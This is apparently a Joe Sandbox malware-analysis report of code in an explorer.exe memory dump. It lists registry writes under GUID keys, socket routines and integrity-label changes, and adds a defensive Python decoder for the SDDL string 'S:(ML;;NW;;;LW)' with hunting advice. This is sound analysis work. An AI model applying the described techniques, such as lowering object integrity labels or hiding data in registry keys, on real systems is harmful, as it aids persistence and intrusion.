• Instruction ID: b7bb44ef5d71faafa0959c3ce7fb96c1d9dfe1a6669ab35ddb9781e1b49dd69d
• Opcode Fuzzy Hash: bf519136ccd4abf063f206afac4ce43c27d6987f6cd99cde0c11dd423466edb2
• Instruction Fuzzy Hash: 4FE1E676206BC0C6FB64CF04F4E57AAB3A0F795704F51026AD68E8A7A8DB7CC549CB41
APIs
  • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
  • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
• RegCreateKeyExW.KERNEL32 ref: 00BE45F4
• RegSetValueExW.KERNEL32 ref: 00BE462B
• RegCloseKey.KERNEL32 ref: 00BE463A
• RegCloseKey.ADVAPI32 ref: 00BE464C
Strings
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: Close$CreateValue_errno_invalid_parameter_noinfo
• String ID: ?$SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
• API String ID: 3235468379-3300995349
• Opcode ID: 15bdf1c67f0d6b560ef70f455f76c195d322f5fde68ac703d852846817008838
• Instruction ID: 617d7f1045778a4d89d224e285a7579f536ae49a74cfd2ffd471584dd1b65147
• Opcode Fuzzy Hash: 15bdf1c67f0d6b560ef70f455f76c195d322f5fde68ac703d852846817008838
• Instruction Fuzzy Hash: 29212E36218B8086E750DF65F894B5AB3A0F785754F404626AA9D83BA8DFBCC548CB04
APIs
  • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
  • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
• RegCreateKeyExW.KERNEL32 ref: 00BE5340
• RegSetValueExW.KERNEL32 ref: 00BE5374
• RegCloseKey.ADVAPI32 ref: 00BE5383
• RegCloseKey.ADVAPI32 ref: 00BE5395
Strings
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: Close$CreateValue_errno_invalid_parameter_noinfo
• String ID: ?$SOFTWARE\%s${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
• API String ID: 3235468379-4032157612
• Opcode ID: 6f8669e0a143de4aee4c000ac57a21c042559d5ee06530f0a717d06ee2fc9d18
• Instruction ID: af044c1326d6c4ec9915e5fb9d72d8601d949357c81201c64019e907f4e949ae
• Opcode Fuzzy Hash: 6f8669e0a143de4aee4c000ac57a21c042559d5ee06530f0a717d06ee2fc9d18
• Instruction Fuzzy Hash: CB213632218B8582F7209F65F89875EB3A0F7C4794F504625EA8943BA8DFBCC548CB04
APIs
• SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7AF
• LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7C3
• wnsprintfW.SHLWAPI ref: 00BEF7FC
• lstrlenW.KERNEL32 ref: 00BEF80B
• CoTaskMemFree.COMBASE ref: 00BEF81D
• CoTaskMemFree.COMBASE ref: 00BEF82F
Strings
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: FreeTask$AllocFolderKnownLocalPathlstrlenwnsprintf
• String ID: %s\%s
• API String ID: 1665550476-4073750446
• Opcode ID: 22d0398798acd8f4693eaf530b2968c768c5f25ad5cccc69d563900eb890bec1
• Instruction ID: bfa2862b59a02506ed1a2935ddbf9db2895d793693550218b57da6437f6b55dd
• Opcode Fuzzy Hash: 22d0398798acd8f4693eaf530b2968c768c5f25ad5cccc69d563900eb890bec1
• Instruction Fuzzy Hash: E111E836628A81C2E750DF55E864B6A73A1FBC4B84F505521FA8F86A68DF7CC45ACB00
                                                                            APIs
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegOpenKeyW.ADVAPI32 ref: 00BE474E
                                                                            • RegSetValueExW.KERNEL32 ref: 00BE4789
                                                                            • RegCloseKey.ADVAPI32 ref: 00BE4798
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenValue_errno_invalid_parameter_noinfo
                                                                            • String ID: SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
                                                                            • API String ID: 2168760479-3800169908
                                                                            • Opcode ID: 3cdd55925c1ca3863a7a95fb6f7a148d8170fcccd79d4e5565ab79c8fd82264d
                                                                            • Instruction ID: 6023b1580fc0d7d199f8d586ed65fa647fd72ffeb811ac039e6f1cd90850685c
                                                                            • Opcode Fuzzy Hash: 3cdd55925c1ca3863a7a95fb6f7a148d8170fcccd79d4e5565ab79c8fd82264d
                                                                            • Instruction Fuzzy Hash: ED115275724A8196E750EF25F854B9A73B0FBC5744F900621A69E83BA8DF7CC908CB80
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00BE778A
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegGetValueW.KERNEL32 ref: 00BE77FC
                                                                            • LocalFree.KERNEL32 ref: 00BE7820
                                                                            Strings
                                                                            • {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}, xrefs: 00BE77E9
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 00BE77A1
                                                                            • SOFTWARE\%s, xrefs: 00BE77A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocFreeValue_errno_invalid_parameter_noinfo
                                                                            • String ID: SOFTWARE\%s${73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3172112264-923683513
                                                                            • Opcode ID: 7bdd416015261c9b4f707f745f03a9e336c444ff69961788039da5d2f607619d
                                                                            • Instruction ID: 6e967dfd881ee59af748ccac978302387cc090421c3c0f54d1652109497b5059
                                                                            • Opcode Fuzzy Hash: 7bdd416015261c9b4f707f745f03a9e336c444ff69961788039da5d2f607619d
                                                                            • Instruction Fuzzy Hash: 71111731218B8082EB50DB65F45879EB3B0F786754FA00625E78D83BA8DF7DC94ACB40
                                                                            APIs
                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00BFE2C7
                                                                            • GetSecurityDescriptorSacl.ADVAPI32 ref: 00BFE2E5
                                                                            • SetNamedSecurityInfoW.ADVAPI32 ref: 00BFE31E
                                                                            • LocalFree.KERNEL32 ref: 00BFE32D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                            • API String ID: 173816248-495562761
                                                                            • Opcode ID: 79cb27a41e6bf29be1783338148c5806ad86ba6a150287ac79480d04f9847149
                                                                            • Instruction ID: 2ce4c051c003af9a82c327d9dab7fc8d0ed9084b1b5189e6dba04fcd73208d08
                                                                            • Opcode Fuzzy Hash: 79cb27a41e6bf29be1783338148c5806ad86ba6a150287ac79480d04f9847149
                                                                            • Instruction Fuzzy Hash: 7B11C572608A8182E7109F50F868B5FB7B0F3C5B95F604116E7C947AA8CFBEC549CB40
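The string `S:(ML;;NW;;;LW)` in the entry above is a SACL holding a single mandatory-label ACE: integrity level Low (S-1-16-4096) with the NoWriteUp policy. Converted by ConvertStringSecurityDescriptorToSecurityDescriptorW and applied to a named object through SetNamedSecurityInfoW (the report does not record which object or which SECURITY_INFORMATION flags), it relabels that object so Low-integrity code can write to it, which is the usual reason malware lowers a label. The decoder below is an added example for this report, not code from the sample or from Joe Sandbox; the SDDL grammar and the S-1-16-* SIDs are Windows-documented, the helper names are mine, and the input strings are constructed.

```python
"""Decode SDDL mandatory-label ACEs such as S:(ML;;NW;;;LW) (added example)."""
import re
from typing import Dict, List, Optional

# Well-known mandatory-level SIDs and the two-letter SDDL aliases Windows accepts.
LEVEL_BY_SID = {
    "S-1-16-0": "Untrusted",
    "S-1-16-4096": "Low",
    "S-1-16-8192": "Medium",
    "S-1-16-8448": "Medium Plus",
    "S-1-16-12288": "High",
    "S-1-16-16384": "System",
}
ALIAS_TO_SID = {"LW": "S-1-16-4096", "ME": "S-1-16-8192", "MP": "S-1-16-8448",
                "HI": "S-1-16-12288", "SI": "S-1-16-16384"}
# Policy bits carried in the rights field of an ML (SYSTEM_MANDATORY_LABEL) ACE.
LABEL_POLICY = {"NW": "NoWriteUp", "NR": "NoReadUp", "NX": "NoExecuteUp"}

# A colon only ever introduces a section (O:, G:, D:, S:); SIDs and ACEs contain none.
_SECTION_RE = re.compile(r"([OGDS]):")
# Plain (non-conditional) ACEs: one parenthesised, semicolon-separated record each.
_ACE_RE = re.compile(r"\(([^)]*)\)")


def split_sections(sddl: str) -> Dict[str, str]:
    """Split an SDDL string into its O:, G:, D: and S: components."""
    marks = list(_SECTION_RE.finditer(sddl))
    out: Dict[str, str] = {}
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(sddl)
        out[m.group(1)] = sddl[m.end():end]
    return out


def parse_aces(acl: str) -> List[Dict[str, object]]:
    """Parse every (type;flags;rights;object;inherit;sid) ACE in an ACL string."""
    aces: List[Dict[str, object]] = []
    for m in _ACE_RE.finditer(acl):
        fields = m.group(1).split(";")
        if len(fields) < 6:
            raise ValueError(f"malformed ACE: {m.group(0)}")
        ace_type, ace_flags, rights, _obj, _inh, sid = fields[:6]
        # Rights are either one hex mask or a run of two-letter tokens (NRNW -> NR, NW).
        if rights.startswith("0x"):
            tokens = [rights]
        else:
            tokens = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "flags": ace_flags, "rights": tokens, "sid": sid})
    return aces


def describe_label(sddl: str) -> Optional[Dict[str, object]]:
    """Describe the integrity label set by the first ML ACE in the SACL, or None if absent.

    An object without an ML ACE is treated as Medium integrity, so an explicit
    Low (or Untrusted) label is what to flag: NoWriteUp only blocks writers
    *below* the label, so Low-integrity code can then write to the object.
    """
    sacl = split_sections(sddl).get("S")
    if sacl is None:
        return None
    for ace in parse_aces(sacl):
        if ace["type"] != "ML":
            continue
        sid = ALIAS_TO_SID.get(str(ace["sid"]), str(ace["sid"]))
        level = LEVEL_BY_SID.get(sid, "Unknown")
        return {
            "sid": sid,
            "level": level,
            "policy": [LABEL_POLICY.get(str(r), str(r)) for r in ace["rights"]],
            "writable_from_low": level in ("Untrusted", "Low"),
        }
    return None


if __name__ == "__main__":
    # Constructed input: the SDDL string the sample hands to
    # ConvertStringSecurityDescriptorToSecurityDescriptorW.
    print(describe_label("S:(ML;;NW;;;LW)"))
```

On a live host the same check can be run against the SDDL of suspect files, directories or named objects (their SACL is readable with SeSecurityPrivilege), which turns this string into a hunting query: any user-writable object carrying an explicit Low label deserves a look.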
                                                                            APIs
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegGetValueW.KERNEL32 ref: 00BE8F1A
                                                                            Strings
                                                                            • SOFTWARE\%s, xrefs: 00BE8EC3
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 00BE8EBC
                                                                            • {BC63A593-23AA-4808-8FB5-F192F2F6D1F9}, xrefs: 00BE8F07
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Value_errno_invalid_parameter_noinfo
                                                                            • String ID: SOFTWARE\%s${BC63A593-23AA-4808-8FB5-F192F2F6D1F9}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 4005939669-1712169463
                                                                            • Opcode ID: 8193e818a9aa16c9e68eee80bca12f6b7fe7f8da997b6d7c19b3560e29706ec1
                                                                            • Instruction ID: 1232451dacc31b329bddb0861306bdbee209d985e35984b5b03d97d0752c75ab
                                                                            • Opcode Fuzzy Hash: 8193e818a9aa16c9e68eee80bca12f6b7fe7f8da997b6d7c19b3560e29706ec1
                                                                            • Instruction Fuzzy Hash: 8BF01D31218B8592FB60DB61F44479A73A4F785354F900222E69C427E8DFBDC249CB84
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
                                                                            • String ID:
                                                                            • API String ID: 3044467104-0
                                                                            • Opcode ID: af6db72d22a5a0b57c07039f707cf0efc0dc65c97e2bfbca397b748c9bcfdb65
                                                                            • Instruction ID: 890211ddff7ee370379fadcbc4d58883d066c1ce6d64d957ddcca97e478cd3d0
                                                                            • Opcode Fuzzy Hash: af6db72d22a5a0b57c07039f707cf0efc0dc65c97e2bfbca397b748c9bcfdb65
                                                                            • Instruction Fuzzy Hash: 2021EA32119A80C6E7329F18E498BDAB3B0F38C749F240215D2CA82A98CF7EC458CF00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wait$ObjectSingleclosesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                            • String ID:
                                                                            • API String ID: 785092289-0
                                                                            • Opcode ID: 8f4642ff7b1716d754dccb156afb2504e9903691b47701658c058a50519b7d20
                                                                            • Instruction ID: 872aa9d9bc9ffac591d046cba13ee89fb6b03dae627686f1daf904fea654031e
                                                                            • Opcode Fuzzy Hash: 8f4642ff7b1716d754dccb156afb2504e9903691b47701658c058a50519b7d20
                                                                            • Instruction Fuzzy Hash: CD21B832159A80C6E732DF18E499BDAB3B1F3DC749F240215D6CA92A98CF7EC455CE00
                                                                            APIs
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegGetValueW.KERNEL32 ref: 00BE46E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Value_errno_invalid_parameter_noinfo
                                                                            • String ID: SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
                                                                            • API String ID: 4005939669-3800169908
                                                                            • Opcode ID: 735573c26684cb50b31dd168d9d8a56d2556d2f01e4cb029fd3cf547ae56ac09
                                                                            • Instruction ID: 25eeec08ba8d74abb2dc426664f60c48a02ff63a34afe49817466355581d44ab
                                                                            • Opcode Fuzzy Hash: 735573c26684cb50b31dd168d9d8a56d2556d2f01e4cb029fd3cf547ae56ac09
                                                                            • Instruction Fuzzy Hash: F5011975618B8186EB60DF64F49478E73A4F785340F904222E6CC42BA8DF7CC549CB80
                                                                            APIs
                                                                            • LocalFree.KERNEL32 ref: 00BE4880
                                                                              • Part of subcall function 00BE4DA0: SHGetKnownFolderPath.SHELL32 ref: 00BE4E23
                                                                            • LocalFree.KERNELBASE ref: 00BE4BF3
                                                                              • Part of subcall function 00BE4710: RegOpenKeyW.ADVAPI32 ref: 00BE474E
                                                                            • LocalFree.KERNEL32 ref: 00BE4C72
                                                                            • WaitForSingleObject.KERNEL32 ref: 00BE4CC6
                                                                            • LocalFree.KERNEL32 ref: 00BE4D45
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$FolderKnownObjectOpenPathSingleWait
                                                                            • String ID:
                                                                            • API String ID: 423962919-0
                                                                            • Opcode ID: 86a66c496532395c50701363ab02f81bfb15527b981d2ba53304625b2c98b4e8
                                                                            • Instruction ID: 3ee4c79b33263abc9ef1f01aceecdf3a5292b2ab11c46cecbe172d7171fcea2e
                                                                            • Opcode Fuzzy Hash: 86a66c496532395c50701363ab02f81bfb15527b981d2ba53304625b2c98b4e8
                                                                            • Instruction Fuzzy Hash: 0E511436206B80C2FB24CF08F4E57A9A3A0F7E4704F51066AD64E8A7A8DFBCC545CB51
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 1073023652-0
                                                                            • Opcode ID: 43dddbbfbda7011b3d8a65e8c8dbcf4d13a1a20bd968318ee48078ba41f9be42
                                                                            • Instruction ID: dcb639a29c5f6309414e4ae5ccf54e3c3365d1bdf8004c92219e97eee209a3ad
                                                                            • Opcode Fuzzy Hash: 43dddbbfbda7011b3d8a65e8c8dbcf4d13a1a20bd968318ee48078ba41f9be42
                                                                            • Instruction Fuzzy Hash: 3B11593215AA80C6E7329F18E499BDAB370F79C759F240215D6C656A98CF7EC455CB00
                                                                            APIs
                                                                            Memory Dump Source
